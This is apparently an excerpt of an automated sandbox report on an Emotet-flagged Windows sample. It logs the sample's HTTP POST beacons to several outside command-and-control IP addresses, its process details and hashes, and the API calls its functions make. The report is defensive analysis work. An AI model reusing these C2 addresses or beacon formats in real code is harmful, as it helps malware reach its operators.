4	192.168.2.5	49910	70.32.115.157	8080	3788	C:\Windows\SysWOW64\fwcfg\wpbcreds.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:20:15.394347906 CET	539	OUT	POST /K3KZ1n42NvAQNZg4/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 70.32.115.157/K3KZ1n42NvAQNZg4/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=--------------------cAGwb81TBde1OYDGtOza Host: 70.32.115.157:8080 Content-Length: 4676 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49983	111.67.12.221	8080	3788	C:\Windows\SysWOW64\fwcfg\wpbcreds.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:20:26.278662920 CET	539	OUT	POST /6o1iAIEQeDHOWcsR/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 111.67.12.221/6o1iAIEQeDHOWcsR/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=--------------------3PCRf3772wYwDZo4k5J9 Host: 111.67.12.221:8080 Content-Length: 4660 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49984	98.13.75.196	80	3788	C:\Windows\SysWOW64\fwcfg\wpbcreds.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:20:30.460777998 CET	626	OUT	POST /H9yA2oaqlws/3MmQ3/8a6D9V6hboQjs/hy9t/w9y8YK55Q41pW7E/9tuVBGyVVtFzFYd/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 98.13.75.196/H9yA2oaqlws/3MmQ3/8a6D9V6hboQjs/hy9t/w9y8YK55Q41pW7E/9tuVBGyVVtFzFYd/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------cu2hEobt4tvmI76 Host: 98.13.75.196 Content-Length: 4644 Cache-Control: no-cache
Nov 11, 2024 18:20:30.460812092 CET	4644	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 75 32 68 45 6f 62 74 34 74 76 6d 49 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6e 6d 64 6c 69 75 22 Data Ascii: -----------------cu2hEobt4tvmI76Content-Disposition: form-data; name="tnmdliu"; filename="skxazjtpltuwne"Content-Type: application/octet-streamEA9+bWKB1ObI$\|@:\tL+f! `~ve`_*U^lnS^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49985	5.196.35.138	7080	3788	C:\Windows\SysWOW64\fwcfg\wpbcreds.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:20:42.389178991 CET	673	OUT	POST /w3vsOgeeY9NPp/vwyrTa5/wI8W1JV8dTW/ZXRlXdiTaaxugNmh5/TPITs41XN0Wtx9UMJWd/VRGGqhut2ut9hId/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 5.196.35.138/w3vsOgeeY9NPp/vwyrTa5/wI8W1JV8dTW/ZXRlXdiTaaxugNmh5/TPITs41XN0Wtx9UMJWd/VRGGqhut2ut9hId/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=-----------------TO1T7raTR7e4z8n5I Host: 5.196.35.138:7080 Content-Length: 4644 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49986	74.58.215.226	80	3788	C:\Windows\SysWOW64\fwcfg\wpbcreds.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:20:46.470030069 CET	530	OUT	POST /yhwXMM7xdxH/yuXOhXg/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 74.58.215.226/yhwXMM7xdxH/yuXOhXg/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------l83eJPEldOxklGM Host: 74.58.215.226 Content-Length: 4644 Cache-Control: no-cache
Nov 11, 2024 18:20:46.470077991 CET	4644	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6c 38 33 65 4a 50 45 6c 64 4f 78 6b 6c 47 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 79 65 64 69 78 65 76 6f Data Ascii: -----------------l83eJPEldOxklGMContent-Disposition: form-data; name="yedixevomlvxtjiysmn"; filename="qophcahpenisxwqoct"Content-Type: application/octet-streamnTGL&{i!t67TG$luE`zCb(5OLY>".)!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49989	186.70.127.199	8090	3788	C:\Windows\SysWOW64\fwcfg\wpbcreds.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:20:58.462727070 CET	613	OUT	POST /i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 186.70.127.199/i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------wFchgTxoaJDVhqc Host: 186.70.127.199:8090 Content-Length: 4644 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49990	1.226.84.243	8080	3788	C:\Windows\SysWOW64\fwcfg\wpbcreds.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:21:10.671874046 CET	583	OUT	POST /tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 1.226.84.243/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------w2uEKzXy195rM91 Host: 1.226.84.243:8080 Content-Length: 4644 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49991	12.162.84.2	8080	3788	C:\Windows\SysWOW64\fwcfg\wpbcreds.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:21:22.761102915 CET	487	OUT	POST /RzqG/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 12.162.84.2/RzqG/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=--------bavvEoDq Host: 12.162.84.2:8080 Content-Length: 4644 Cache-Control: no-cache

Target ID:	0
Start time:	12:19:29
Start date:	11/11/2024
Path:	C:\Users\user\Desktop\75A0VTo3z9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\75A0VTo3z9.exe"
Imagebase:	0xb0000
File size:	117'248 bytes
MD5 hash:	921577C536C85169A26CAF0B69A6D82D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.2039200708.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:19:29
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\fwcfg\wpbcreds.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\fwcfg\wpbcreds.exe"
Imagebase:	0xb0000
File size:	117'248 bytes
MD5 hash:	921577C536C85169A26CAF0B69A6D82D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.2040983750.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.3288300959.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.4%
Total number of Nodes:	1022
Total number of Limit Nodes:	11

Executed Functions

Function 000B7E50 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 237
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00C42D80,F99B4000,00000000), ref: 000B8149
SetFileInformationByHandle.KERNELBASE(133C7E34,00000000,?,00000028), ref: 000B81BE
CloseHandle.KERNELBASE(133C7E34), ref: 000B81F4

Strings

;c, xrefs: 000B7ECB
)V, xrefs: 000B7F34

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID: FileHandle$CloseCreateInformation
String ID: )V$;c
API String ID: 1240749428-869850096
Opcode ID: 6485c3165368e5a1492f70bd0a337bd87ec558e397db5da8ddcb296c9bf64f93
Instruction ID: ca9cacc5f276afcc2959b7bbfe865bc042362a4558b684091480bcef626995c7
Opcode Fuzzy Hash: 6485c3165368e5a1492f70bd0a337bd87ec558e397db5da8ddcb296c9bf64f93
Instruction Fuzzy Hash: 2791AA706083418FD358EF68D8956ABB7E4EBC4344F10492DF4969B2A1EB74CE49CF92

Function 000B8210 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 193
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,?,F99B4000,00000000), ref: 000B845D

Strings

)V, xrefs: 000B830D
;c, xrefs: 000B82A4
GY., xrefs: 000B840E
GY., xrefs: 000B8367

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: )V$;c$GY.$GY.
API String ID: 823142352-4287404121
Opcode ID: a797d7402678bd84fec192c15533818ea95d2e508fbe79cda9b30b1b56b88285
Instruction ID: a11e7f12a0ebb77b8e2c8d0a5ca5e3c702edfa36deffeeefca3059913805358a
Opcode Fuzzy Hash: a797d7402678bd84fec192c15533818ea95d2e508fbe79cda9b30b1b56b88285
Instruction Fuzzy Hash: F271AD716083428BD754DF68C4856AFB7E4BBD4714F00891DF4A5AB2A0EBB4DE09CB82

Function 000B36A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 212
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,00000010), ref: 000B371B
FindFirstFileW.KERNELBASE(?,00000010), ref: 000B375E
FindClose.KERNELBASE(?,?,?,00000001,00000000), ref: 000B3994

Strings

., xrefs: 000B384F

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: .
API String ID: 3541575487-248832578
Opcode ID: e91d87f21478d9267f3d7a87072a4a154992cd1c4bb3047956e735b84ee97cc7
Instruction ID: 6e40aa05d1f9e727e34d4125f7ffea54e1c89bb64f2ebcebbc07266d88f53e75
Opcode Fuzzy Hash: e91d87f21478d9267f3d7a87072a4a154992cd1c4bb3047956e735b84ee97cc7
Instruction Fuzzy Hash: 6661D2B17043809BDB64AFB8D8956FB26D1DBD0340F308A2DB595D7351EE39CE058B92

Function 000B6F10 Relevance: 1.6, APIs: 1, Instructions: 109
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(00000000,?,19922D31,000B65DB), ref: 000B6FBB

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 64d9de9f3735db7344b66145426d5bcdbc194903de0ec94377cf8ee59e60cd29
Instruction ID: 7e1942e5e24a3d3ce339bdb08ec162d216b7021bb45faded832c9a474c74a5e6
Opcode Fuzzy Hash: 64d9de9f3735db7344b66145426d5bcdbc194903de0ec94377cf8ee59e60cd29
Instruction Fuzzy Hash: 0D31C42171810187DA747A68E8A17FE25E2DBD0384F34483BF405DB356ED3EDD415B82

Function 000B9680 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 200
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 000B97D9
RtlAllocateHeap.NTDLL(00000000,00000008,00000480), ref: 000B98FE

Strings

WDuA, xrefs: 000B97B5
j]1, xrefs: 000B968A
j]1, xrefs: 000B98A3
p^v, xrefs: 000B98D2, 000B98F1
WDuA, xrefs: 000B987B

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID: AllocateHeapManagerOpen
String ID: WDuA$WDuA$j]1$j]1$p^v
API String ID: 963794170-3462980882
Opcode ID: a6a8c4d0217a0991b1c6046775ef8d2c962eab8f2ceb21bc2bc6c620a9faa9c1
Instruction ID: 722ea7d38f4081daa2317b1844130946b0335e2f3d49b9aae06ed58e86850c2d
Opcode Fuzzy Hash: a6a8c4d0217a0991b1c6046775ef8d2c962eab8f2ceb21bc2bc6c620a9faa9c1
Instruction Fuzzy Hash: 5E61D3307442018BEBA4DF68D8967EE37D0AB91B40F64052DF646EB3A1EE75CD05CB52

Function 000B2EA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000238), ref: 000B2F63

Strings

p^v, xrefs: 000B2F37, 000B2F56

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: p^v
API String ID: 1279760036-2513449335
Opcode ID: 2fc5d60425b1034bb0a9ffecb89ad90d0d52156aa45eb974d862e739a4dfd30e
Instruction ID: d05faa2f281868a51bcb1fded6f16e1c25d818fc5666f08ac4f5dcdacdd089b8
Opcode Fuzzy Hash: 2fc5d60425b1034bb0a9ffecb89ad90d0d52156aa45eb974d862e739a4dfd30e
Instruction Fuzzy Hash: 1B41DF316043018B9B68EE69D4945EEB7E5EBD0350F304D2EE482DB351DB70DE468B92

Function 000B4990 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 000B4A11

Strings

D, xrefs: 000B49D0

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: 75ccbf637d3a19260def141e32ed60aaec4e750bed8150fec5818b9f272009ad
Instruction ID: d4ef9e1b9709796aa8c5b1de43e31b50368f52a68ab6bc0201ca8969d9f4d947
Opcode Fuzzy Hash: 75ccbf637d3a19260def141e32ed60aaec4e750bed8150fec5818b9f272009ad
Instruction Fuzzy Hash: CA218B317046419BE714AFB8DC52BEB76D6ABC0740F204929B965DB2A2EE34DE058782

Function 000B40D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 000B4124

Strings

p^v, xrefs: 000B40FC, 000B411B

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: p^v
API String ID: 1279760036-2513449335
Opcode ID: f628be2d5a445375b6df4afbe226801afbc393809ec9df44ce2ec32bec1e94f4
Instruction ID: ae578945a6c2465693f53dd92e04ebe4fb276006b13c670c24f09bcd0c2a4781
Opcode Fuzzy Hash: f628be2d5a445375b6df4afbe226801afbc393809ec9df44ce2ec32bec1e94f4
Instruction Fuzzy Hash: 8FE0653170025047EB50BBFCBC56AEB16D5DBD0B807204929B501E7252EE78CE010B91

Function 000B5AD0 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 000B5AFB

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 58a1c1be678f219789df775422b5ef5001a0f6362bf9ab22f7c386ee0c0fba7d
Instruction ID: 666402fc1b9c32ef0a04b8a013222b81873cd041015ddcb5f4727aa4881200e6
Opcode Fuzzy Hash: 58a1c1be678f219789df775422b5ef5001a0f6362bf9ab22f7c386ee0c0fba7d
Instruction Fuzzy Hash: 9BD0C920300201CAE6447BF8A8D27EA59828B80781F20891AA5419B296EEB48D409751

Function 000B3460 Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE ref: 000B3527

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 53bbb7875524327075e610b6db3a9ad3ac2405ecb7d63ecd811e2560968aba9a
Instruction ID: 7db923ec521a2ef7f92c2fcd815b3bbfa8d4f194aebaa9a2bffecf4dfa27d1ae
Opcode Fuzzy Hash: 53bbb7875524327075e610b6db3a9ad3ac2405ecb7d63ecd811e2560968aba9a
Instruction Fuzzy Hash: E911733070024187D754BBB9AC66BEB6AD6DBD0784B304A2DB915DB352FE3CCE058B91

Function 000B6E70 Relevance: 1.5, APIs: 1, Instructions: 45
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(00000000,?,19922D31,000B7097,?,19922D31,000B65DB), ref: 000B6EA0

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 66da402b91805c0f2e3b683f870f3c0e7bf07d4669197ec8ca6ad0cf9000c5c9
Instruction ID: 2a1e26c71fa34af5ba40b3f03247e470ad4362f61172a21c62c61d0e686112a8
Opcode Fuzzy Hash: 66da402b91805c0f2e3b683f870f3c0e7bf07d4669197ec8ca6ad0cf9000c5c9
Instruction Fuzzy Hash: 0A014B307002908BA754BFB9A8917EB27D6DBD43807204929A425DB362FE38DE014B91

Non-executed Functions

Function 000B6340 Relevance: 21.7, APIs: 2, Strings: 10, Instructions: 686COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000B6A6A
GetTickCount.KERNEL32 ref: 000B6C31

Strings

ma& , xrefs: 000B6717
z`, xrefs: 000B63B0
8=J, xrefs: 000B6618
z`, xrefs: 000B6E36
_F, xrefs: 000B6A72
8e5, xrefs: 000B6CAB
8e5, xrefs: 000B6C9E
bJr9, xrefs: 000B6E14
bJr9, xrefs: 000B68D4
8e5, xrefs: 000B6662

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: 8e5$8e5$8e5$z`$z`$8=J$_F$bJr9$bJr9$ma&
API String ID: 536389180-1922213847
Opcode ID: d6cfb2a505a57810e66642f52844d9b3ebcecf68c52702ce0ef1b7bc3770533a
Instruction ID: 403b10b4a72ac645efbbde62888c4d1a0fa06e04fcabdebec6a59b4c5f027b65
Opcode Fuzzy Hash: d6cfb2a505a57810e66642f52844d9b3ebcecf68c52702ce0ef1b7bc3770533a
Instruction Fuzzy Hash: CB32D2B16083018BD768DF68D4955EE76E1EB90744F24092EE582D7362DB3ACE48CBD3

Function 000B4E60 Relevance: 10.2, Strings: 8, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WDuA, xrefs: 000B5006
WDuA, xrefs: 000B4EE0
WDuA, xrefs: 000B50ED
WDuA, xrefs: 000B4FBF
WDuA, xrefs: 000B4F88
GU-, xrefs: 000B5136
p^v, xrefs: 000B50A0, 000B50BF
GU-, xrefs: 000B5052

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID:
String ID: GU-$GU-$WDuA$WDuA$WDuA$WDuA$WDuA$p^v
API String ID: 0-3451513389
Opcode ID: 99b47fb53acca1d21fdd5fb1f9620ad8b591ee5d62c6dcc2d4e82e08278f5c40
Instruction ID: d41a79821d48b94ab4a73c5c916d19da40322cdda7895997f767642c9edd69d5
Opcode Fuzzy Hash: 99b47fb53acca1d21fdd5fb1f9620ad8b591ee5d62c6dcc2d4e82e08278f5c40
Instruction Fuzzy Hash: C1711831B046119BDB64BFB8DC817EB36D6AB84340F250969F851EB292EB75DE004B82

Function 000B7620 Relevance: 7.7, Strings: 6, Instructions: 242COMMON

Download Yara Rule

Strings

